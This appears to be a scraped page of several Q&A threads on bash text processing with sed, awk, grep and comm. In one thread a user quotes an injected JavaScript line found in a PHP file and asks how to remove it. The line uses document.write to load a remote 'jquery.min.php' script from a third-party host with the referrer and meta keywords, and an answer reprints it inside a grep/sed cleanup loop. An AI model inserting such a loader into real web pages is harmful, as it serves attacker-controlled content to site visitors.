Removing strings from file using bash script - linux

I want to delete specific strings from a file.
I tried to use:
for line3 in $(cat 2.txt)
do
if grep -Fxq $line3 4.txt
then
sed -i /$line3/d 4.txt
fi
done
I want this code to delete lines from 4.txt if they are also in 2.txt, but this loop deletes all lines from 4.txt and I have no idea why. Can someone tell me what is wrong with this code?
2.txt:
a
ab
abc
4.txt:
a
abc
abcdef

You can do this with a single awk command:
awk 'ARGV[1] == FILENAME && FNR==NR {a[$1];next} !($1 in a)' 2.txt 4.txt
abcdef
To store output back to 4.txt use:
awk 'ARGV[1] == FILENAME && FNR==NR {a[$1];next} !($1 in a)' 2.txt 4.txt > _tmp && mv _tmp 4.txt
PS: ARGV[1] == FILENAME && was added to handle the case of an empty 2.txt, as noted by @pjh below.

grep -F -v -x -f 2.txt 4.txt
or
grep -Fvxf 2.txt 4.txt
or
fgrep -vxf 2.txt 4.txt
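As for why the loop in the question empties 4.txt: sed -i /$line3/d deletes every line that contains the string anywhere, and every line of 4.txt contains an a. The -x flag above is what restricts grep to whole-line matches. A minimal sketch that recreates the sample data in a scratch directory (the workdir variable and the mktemp location are assumptions made for the demo) and shows both behaviours:

```shell
# Recreate the sample files from the question in a scratch directory.
workdir=$(mktemp -d)
printf '%s\n' a ab abc > "$workdir/2.txt"
printf '%s\n' a abc abcdef > "$workdir/4.txt"

# Unanchored: /a/ matches every line that contains an "a", so nothing survives.
unanchored=$(sed '/a/d' "$workdir/4.txt")

# Whole-line, fixed-string match: only lines identical to a line of 2.txt are dropped.
filtered=$(grep -Fvxf "$workdir/2.txt" "$workdir/4.txt")

printf 'unanchored: [%s]\n' "$unanchored"
printf 'filtered:   [%s]\n' "$filtered"
```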

Using just Bash (4) builtins:
declare -A found
while IFS= read -r line || [[ $line ]] ; do found[$line]=1 ; done <2.txt
while IFS= read -r line || [[ $line ]] ; do
(( ${found[$line]-0} )) || printf '%s\n' "$line"
done <4.txt
The '[[ $line ]]' tests are to handle files with unterminated last lines.
Use 'printf' instead of 'echo' in case any of the output lines begin with 'echo' options.

Look ma', only sed...
sed $( sed 's,^, -e /^,;s,$,$/d,' 2.txt ) 4.txt
Transform each line in 2.txt into a sed command, e.g., abc -> -e /^abc$/d
Pass the resulting list of sed commands to an instance of sed operating on 4.txt
To store output back to 4.txt use:
sed -i $( sed 's,^, -e /^,;s,$,$/d,' 2.txt ) 4.txt
Edit: while I love my answer on aesthetic grounds, please don't try this at home! See pjh's comment below for a detailed rationale of the many ways in which my microscript may fail.

Related

Bash: How to check for first three characters in a file

After some string conversion of heterogeneous data, there are files with the following content:
file1.txt:
mat 445
file2.txt:
mat 734.2
and so on. But there are also intruders that do not match that pattern, e.g.
filen.txt:
mat 1
FBW
I would like to process every line that starts with "mat", while all other lines should be deleted.
The following does not work (and seems rather cumbersome):
for f in *.txt ; do
if [[ ${f:0:3} == "mat" ]]; then
# do some string conversion with that line, which is not important here
sed -i -e 's/^.*\(mat.*\).*$/\1/' $f
sed -i -e 's/ //g' $f
tr '.' '_' < $f
sed -i -e 's/^/\<http:\/\/uricorn.fly\/tib\_lok\_sys\#/' "$f"
sed -i -e 's/\(.*\)[0-9]/&> /' "$f"
else
# delete the line that does not match the pattern
sed -i -e '^[mat]/d' $f
fi
done
As the comment below shows, the if condition is incorrect because it tests the file's name rather than its content.
Desired output should then be:
file1.txt
<http://uricorn.fly/tib_lok_sys#mat445>
file2.txt
<http://uricorn.fly/tib_lok_sys#mat734_2>
filen.txt
<http://uricorn.fly/tib_lok_sys#mat1>
How can this be achieved?
Source data, with some extras added to the last 2 files:
$ for s in 1 2 n
do
fn="file${s}.txt"
echo "+++++++++++ ${fn}"
cat "${fn}"
done
+++++++++++ file1.txt
mat 445
+++++++++++ file2.txt
mat 734.2.3
+++++++++++ filen.txt
mat 1 2 3
FBW
One awk solution that implements the most recent set of question edits:
awk -i inplace ' # overwrite the source file
/^mat/ { gsub(/ /,"") # if the line starts with "mat" then remove spaces ...
gsub(/\./,"_") # ... and replace periods with underscores
printf "<http://uricorn.fly/tib_lok_sys#%s>\n", $0 # print the desired output
}
' file{1,2,n}.txt
NOTES:
the -i inplace option requires GNU awk 4.1.0 (or better)
remove comments to declutter code
The above generates the following:
$ for s in 1 2 n
do
fn="file${s}.txt"
echo "+++++++++++ ${fn}"
cat "${fn}"
done
+++++++++++ file1.txt
<http://uricorn.fly/tib_lok_sys#mat445>
+++++++++++ file2.txt
<http://uricorn.fly/tib_lok_sys#mat734_2_3>
+++++++++++ filen.txt
<http://uricorn.fly/tib_lok_sys#mat123>
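If -i inplace is not available (a non-GNU awk, or GNU awk older than 4.1.0), the same program can be run per file through a temporary file. This is only a sketch: the scratch directory, the sample files, and the .tmp suffix are assumptions made for illustration, and the sample data is the original data from the question.

```shell
# Sample files as given in the question, created in a scratch directory.
workdir=$(mktemp -d)
printf 'mat 445\n' > "$workdir/file1.txt"
printf 'mat 734.2\n' > "$workdir/file2.txt"
printf 'mat 1\nFBW\n' > "$workdir/filen.txt"

for f in "$workdir"/*.txt; do
    # Write the converted lines to a temporary file, then replace the original
    # only if awk succeeded. Lines that do not start with "mat" are not printed.
    awk '/^mat/ {
        gsub(/ /, "")
        gsub(/\./, "_")
        printf "<http://uricorn.fly/tib_lok_sys#%s>\n", $0
    }' "$f" > "$f.tmp" && mv "$f.tmp" "$f"
done

cat "$workdir"/*.txt
```

The glob is expanded before the loop starts, so the .tmp files created along the way are not picked up as input.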
Sed:
sed -ri '/^mat/!d;s/[ ]//g;s/[.]/_/g;s|^(.*)$|<http://uricorn.fly/tib_lok_sys#\1>|' *.txt
Delete every line that does not start with mat; on the remaining lines, remove spaces, replace . with _, and finally wrap the result in the URI prefix and a closing >. The last substitution uses | as its delimiter because the replacement text itself contains a #.
The other answers are far more elegant, but none of them worked on my system, so here is what eventually did:
for f in *.txt ; do
# Remove every line that does not contain 'mat'
sed -i '/mat/!d' "$f"
# Remove every character until 'mat' begins
sed -i -e 's/^.*\(mat.*\).*$/\1/' "$f"
# Remove the blank between 'mat' and number
sed -i -e 's/ //g' "$f"
# Replace the dot in subcategories with an underscore
# (tr only writes to stdout, so use sed -i to change the file itself)
sed -i -e 's/\./_/g' "$f"
# Add URI
sed -i -e 's/^/\<http:\/\/uricorn.fly\/tib\_lok\_sys\#/' "$f"
sed -i -e 's/\(.*\)[0-9]/&> /' "$f"
# Print the result with adjacent duplicate lines collapsed
uniq "$f"
done

Linux - script to copy a line from one file to multiple other files

I'm stuck with this task:
I have a text file 1.txt with one variable on each line. I have a text file 2.txt in which I want to replace line 3 with a variable from 1.txt and save the result under a directory that has the same name as the variable. My idea was this:
#!/bin/bash
for i in `cat 1.txt`;
do awk '{ if (NR == 3) print $i; else print $0}' 2.txt > "/$i/2.txt";
done
The last part works: I get the file in the expected folder. But it is always the same file, just copied, not modified.
Any help appreciated.
Edit: to make it clearer, my 1.txt contains data like:
variable1
variable2
variable3
each on its own line.
I now want to edit the file 2.txt, insert variable1 on line 3, and save it to /variable1/2.txt,
then open 2.txt again, insert variable2 on line 3, and save it to /variable2/2.txt,
and so on.
Hope that makes it clearer ;)
Not sure I quite follow what you are doing but the following code is one way to do what you describe:
#!/bin/bash
while IFS= read -r variable; do
mkdir "$variable"
echo -e "\n\n$variable" > "${variable}/2.txt"
done < 1.txt
The output is:
$ cat variable?/2.txt
variable1
variable2
variable3
EDIT: after reading the comment on the solution by @Jetchisel, a similar solution using Vim's ex command is:
#!/bin/bash
while IFS= read -r variable; do
ex "+normal! 2G" "+normal o${variable}" "+wq" "${variable}/2.txt"
done < 1.txt
Here is how I understood your question.
while IFS= read -r lines; do
[[ ! -d "/$lines" ]] && { mkdir -p "/$lines" || exit; }
printf '%s\n' '3c' "$lines" . ,p Q | ed -s 2.txt > "/$lines/2.txt"
done < 1.txt
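For reference, the awk attempt in the question copies 2.txt unchanged because the shell does not expand $i inside single quotes; awk sees its own uninitialized variable i, so $i evaluates to $0, the whole line. One way to pass the value in is awk -v. A minimal sketch, assuming a four-line 2.txt and writing the directories under a scratch directory (workdir, hypothetical) instead of /:

```shell
# Demo input: three variable names and a four-line template.
workdir=$(mktemp -d)
printf '%s\n' variable1 variable2 variable3 > "$workdir/1.txt"
printf '%s\n' 'line 1' 'line 2' 'line 3' 'line 4' > "$workdir/2.txt"

while IFS= read -r name; do
    mkdir -p "$workdir/$name" || exit 1
    # -v copies the shell value into the awk variable "repl";
    # line 3 is replaced by it, every other line is printed as is.
    awk -v repl="$name" 'NR == 3 { print repl; next } { print }' \
        "$workdir/2.txt" > "$workdir/$name/2.txt"
done < "$workdir/1.txt"

cat "$workdir/variable2/2.txt"
```

Note that awk -v interprets backslash escape sequences in the value, so names that contain backslashes would need a different mechanism, such as ENVIRON.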

replace a whole line in a file centos

I have a script in a .php file, which is the following:
var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('http://mydemo.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<'+'/script>');}
From the command line, I would like to replace the whole line with a single (1) blank character. Is it possible? I tried to do it with sed, but the string is probably too complex. I also tried to put the string in a variable, but that didn't work either. Does anybody have any idea?
This is actually something sed excels at. :)
sed -i '1s/.*/ /' your-file
Example:
$ cat test
one
two
three
$ sed '1s/.*/ /' < test
two
three
I tested this script on OS X:
for strnum in $(grep -n "qwe" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i '.txt' $strnum's/.*/ /' test.txt; done
On CentOS, this script should work:
for strnum in $(grep -n "qwe" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i $strnum's/.*/ /' test.txt; done
Replace qwe with your own pattern. The script replaces every line in which the pattern is found with a single space.
The pattern has to be prepared before it can be passed to grep. Create a file (your_file) that contains the required pattern and run:
echo '"'$(cat your_file | sed -e 's|"|\\"|g')'"'
Replace qwe (including its quotes) with the output of this command.
You should get something like this:
for strnum in $(grep -n "var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+\"//\"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('http://mydemo.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<'+'/script>');}" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i $strnum's/.*/ /' test.txt; done
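Since quoting such a long line for grep is error-prone, an alternative is to avoid regular expressions entirely and compare whole lines as plain strings. A rough sketch with awk, assuming the offending line has been saved verbatim into a file (pattern.txt, a hypothetical name) and that the file to clean is target.php (also hypothetical); a shortened stand-in is used for the script line:

```shell
workdir=$(mktemp -d)
# pattern.txt holds the exact line to blank out (a short stand-in here).
printf '%s\n' "var a='';setTimeout(10);document.write('x'+\"//\");" > "$workdir/pattern.txt"
printf '%s\n' '<?php' "var a='';setTimeout(10);document.write('x'+\"//\");" 'echo "ok";' > "$workdir/target.php"

awk 'NR == FNR { bad[$0]; next }      # first file: remember each line verbatim
     $0 in bad { print " "; next }    # exact match: emit a single space instead
     { print }' "$workdir/pattern.txt" "$workdir/target.php" > "$workdir/target.php.tmp" &&
    mv "$workdir/target.php.tmp" "$workdir/target.php"

cat "$workdir/target.php"
```

Because the comparison is a plain string lookup, characters such as ., (, | or quotes in the line need no escaping.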

Comparing two files script and finding the unmatched data

I have two .txt files with data stored in the following format:
1.txt
ASF001-AS-ST73U12
ASF001-AS-ST92U14
ASF001-AS-ST105U33
ASF001-AS-ST107U20
and
2.txt
ASF001-AS-ST121U21
ASF001-AS-ST130U14
ASF001-AS-ST73U12
ASF001-AS-ST92U14
I need to find the entries that are in 1.txt but not in 2.txt.
I tried to use
diff -a --suppress-common-lines -y 1.txt 2.txt > finaloutput
but it didn't work.
Rather than diff you can use comm here:
comm -23 <(sort 1.txt) <(sort 2.txt)
ASF001-AS-ST105U33
ASF001-AS-ST107U20
Or this awk will also work:
awk 'FNR==NR {a[$1];next} $1 in a{delete a[$1]} END {for (i in a) print i}' 1.txt 2.txt
ASF001-AS-ST107U20
ASF001-AS-ST105U33
A relatively simple bash script can do what you need:
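#!/bin/bash
# Print each line of the first file that does not occur as a whole line in the second.
while IFS= read -r line || test -n "$line"; do
grep -Fxq -- "$line" "$2" || echo "$line"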
done < "$1"
exit 0
output:
$ ./uniquef12.sh dat/1.txt dat/2.txt
ASF001-AS-ST105U33
ASF001-AS-ST107U20
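Another option that keeps the original order of 1.txt and needs no sorting is grep with a pattern file: -F treats the lines of 2.txt as fixed strings, -x requires whole-line matches, and -v inverts the result. A small sketch using the sample data from the question (the scratch directory and the only_in_1 variable are just for the demo):

```shell
workdir=$(mktemp -d)
printf '%s\n' ASF001-AS-ST73U12 ASF001-AS-ST92U14 ASF001-AS-ST105U33 ASF001-AS-ST107U20 > "$workdir/1.txt"
printf '%s\n' ASF001-AS-ST121U21 ASF001-AS-ST130U14 ASF001-AS-ST73U12 ASF001-AS-ST92U14 > "$workdir/2.txt"

# Lines of 1.txt that are not identical to any line of 2.txt.
only_in_1=$(grep -Fvxf "$workdir/2.txt" "$workdir/1.txt")
printf '%s\n' "$only_in_1"
```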

Show uncommon part of the line

Hi, I have two files that contain paths. I want to compare the two files and show only the uncommon part of each line.
1.txt:
/home/folder_name/abc
2.txt:
/home/folder_name/abc/pqr/xyz/mnp
Output I want:
/pqr/xyz/mnp
How can I do this?
This bit of awk does the job:
$ awk 'NR==FNR {a[++i]=$0; next}
{
b[++j]=$0;
if(length(a[j])>length(b[j])) {t=a[j]; a[j]=b[j]; b[j]=t}
sub(a[j],"",b[j]);
print b[j]
}' 1.txt 2.txt # or 2.txt 1.txt, it doesn't matter
Write the line from the first file to the array a.
Write the line from the second to b.
Swap a[j] and b[j] if a[j] is longer than b[j] (this might not be necessary if the longer text is always in b).
Remove the part found in a[j] from b[j] and print b[j].
This is a general solution; it makes no assumption that the match is at the start of the line, or that the contents of one file's line should be removed from the other. If you can afford to make those assumptions, the script can be simplified.
If the match may occur more than once on the line, you can use gsub rather than sub to perform a global substitution.
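As an illustration of that simplification, here is a sketch that assumes each line of 1.txt is a prefix of the line with the same number in 2.txt. It uses index() and substr() rather than sub(), so the path is compared as a plain string and not as a regular expression. The scratch directory and variable names are made up for the demo:

```shell
workdir=$(mktemp -d)
printf '%s\n' /home/folder_name/abc > "$workdir/1.txt"
printf '%s\n' /home/folder_name/abc/pqr/xyz/mnp > "$workdir/2.txt"

remainder=$(awk 'NR == FNR { prefix[FNR] = $0; next }
     {
         p = prefix[FNR]
         # index() compares plain strings, so regex metacharacters in paths are harmless
         if (index($0, p) == 1) print substr($0, length(p) + 1)
         else print
     }' "$workdir/1.txt" "$workdir/2.txt")
printf '%s\n' "$remainder"
```

Lines of 2.txt that do not start with the corresponding line of 1.txt are printed unchanged.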
Assuming you have strings in 1.txt and in 2.txt, the following code will do:
paste 1.txt 2.txt |
while read a b;
do
if [[ ${#a} -gt ${#b} ]];
then
echo ${a/$b};
else
echo ${b/$a};
fi;
done;
This is how it works on my system:
shiplu#:~/test/bash$ cat 1.txt
/home/shiplu/test/bash
/home/shiplu/test/bash/hello/world
shiplu#:~/test/bash$ cat 2.txt
/home/shiplu/test/bash/good/world
/home/shiplu/test/bash
shiplu#:~/test/bash$ paste 1.txt 2.txt |
> while read a b;
> do
> if [[ ${#a} -gt ${#b} ]];
> then
> echo ${a/$b};
> else
> echo ${b/$a};
> fi;
> done;
/good/world
/hello/world
This script compares the files line by line and outputs only the part of each line that differs.
First, it counts the number of lines in the first file.
Then it starts a loop that iterates once per line.
Inside the loop, it declares two variables that hold the same line from both files.
It compares the lines and, if they are the same, reports that they are.
If they are not, it replaces the duplicated part of the string with nothing (effectively removing it).
I used : as the separator in sed because your variables contain /. If they may also contain :, you will want to choose a different separator.
Probably not the most efficient solution, but it works.
#!/bin/bash
NUMOFLINES=$(wc -l < "1.txt")
echo $NUMOFLINES
for ((i = 1 ; i <= $NUMOFLINES ; i++)); do
f1=$(sed -n $i'p' 1.txt)
f2=$(sed -n $i'p' 2.txt)
if [[ $f1 < $f2 ]]; then
echo -n "Line $i:"
sed 's:'"$f1"'::' <<< "$f2"
elif [[ $f1 > $f2 ]]; then
echo -n "Line $i:"
sed 's:'"$f2"'::' <<< "$f1"
else
echo "Line $i: Both lines are the same"
fi
echo ""
done
If you happen to use bash, you could try this one:
echo $(diff <(grep -o . 1.txt) <(grep -o . 2.txt) \
| sed -n '/^[<>]/ {s/^..//;p}' | tr -d '\n')
It does a character-by-character comparison using diff (grep -o . puts each character on its own intermediate line so that the line-wise diff can compare them) and prints only the differences: the sed command keeps the diff output lines that start with the markers < or >, strips the markers, and tr then joins the lines.
If you have multiple lines in your input (which you did not mention in your question) then try something like this (where % is a character not contained in your input):
diff <(cat 1.txt | tr '\n' '%' | grep -o .) \
<(cat 2.txt | tr '\n' '%' | sed -e 's/%/%%/g' | grep -o .) \
| sed -n '/^[<>]/ {s/^..//;p}' | tr -d '\n' | tr '%' '\n'
This extends the single-line solution by adding line end markers (e.g. %) which diff is forced to include in its output by adding % on the left and %% on the right.
If both files always contain a single line each, then the following works:
perl -lne '$a=$_ if($.==1);print $1 if(/$a(.*)/ && $.==2)' 1.txt 2.txt
Tested below:
> cat 1.txt
/home/folder_name/abc
> cat 2.txt
/home/folder_name/abc/pqr/xyz/mnp
> perl -lne '$a=$_ if($.==1);print $1 if(/$a(.*)/ && $.==2)' 1.txt 2.txt
/pqr/xyz/mnp
>
